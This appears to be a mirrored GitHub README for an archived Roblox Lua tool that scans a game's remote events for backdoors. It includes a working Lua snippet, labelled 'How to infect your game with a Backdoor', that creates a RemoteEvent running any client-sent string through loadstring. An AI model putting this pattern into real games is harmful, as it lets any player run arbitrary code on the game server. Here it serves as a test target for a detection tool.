k4scripts / backdoor.exe

The best backdoor scanner there is.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Version Maintenance License: GPL--3.0

🚨 THIS HAS BEEN ARCHIVED/DISCONTINUED UNTIL FUTHER NOTICE 🚨

An in-game interface/tool to scan every remote for backdoors.
Tool was made to find backdoors in your game. This is NOT a backdoor itself.

How to infect your game with a Backdoor

local backdoor = Instance.new("RemoteEvent", game.ReplicatedStorage)
backdoor.Name = "Backdoor"
backdoor.OnServerEvent:connect(function(player, SS)
    loadstring(SS)()
end)

Do not forget to Enable Loadstrings in ServerScriptServices
image

Macros

Macros are string that get replaced so you don't have to type out your information each time.

MACRO INFO
%username% Your username
%userid% Your User ID
%userping% Your ping
%debug% Your debug setting

Contributing

Contributions, issues, and feature requests are welcome!
Feel free to check issues page.

  • Undetected backdoors reports are appreciated as contribute to providing the best-updated backdoor scanner out there.

Show your support

Give a ⭐️ if this project helped you or join our Discord !

📝 License

Copyright © 2021 iK4oS.
This project is GPL-3.0 licensed.

About

The best backdoor scanner there is.

License:GNU General Public License v3.0


Languages

Language:Lua 100.0%